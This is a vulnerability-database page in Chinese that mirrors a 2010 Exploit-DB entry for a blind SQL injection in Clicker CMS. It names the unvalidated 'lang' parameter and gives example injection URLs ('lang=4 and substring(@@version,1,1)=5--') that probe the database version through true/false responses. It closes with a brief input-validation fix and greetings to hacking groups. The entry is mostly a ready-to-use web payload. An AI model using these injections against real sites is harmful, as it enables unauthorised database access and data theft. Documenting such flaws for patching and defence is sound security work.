Clicker CMS - Blind SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1060556 漏洞类型
发布时间 2010-06-26 更新时间 2010-06-26
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/14056
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: Clicker CMS Blind SQL Injection Vulnerability
# Date: 2010-06-25
# Author: hacker@sr.gov.yu
# Software Link: n/a
# Version: n/a


####################################################################
.:. Author : hacker@sr.gov.yu
.:. Contact: hacker@evilzone.org, hacker@sr.gov.yu(MSN)
.:. Home : www.evilzone.org, www.balcan-security.com
.:. Script : Clicker CMS
.:. Bug Type : Blind Sql Injection
.:. Risk: High
.:. Tested on : Windows & Linux
####################################################################

===[ Exploit ]===

.:. It was found that Clicker CMS does not validate properly the "lang"
parameter value.

http://server/index.php?lang=4[BSQLi]

===[ Example ]===

http://server/index.php?lang=4 and substring(@@version,1,1)=5-- (true or false)
http://server/index.php?lang=4 and substring(@@version,1,1)=4-- (false or true)


===[ Solution ]===

.:. Input validation of "lang" parameter should be corrected.


Greetz to ALL EVILZONE.org && BALCAN-SECURITY.com members!!!
Pozdrav za sve iz Srbije!!! :-)))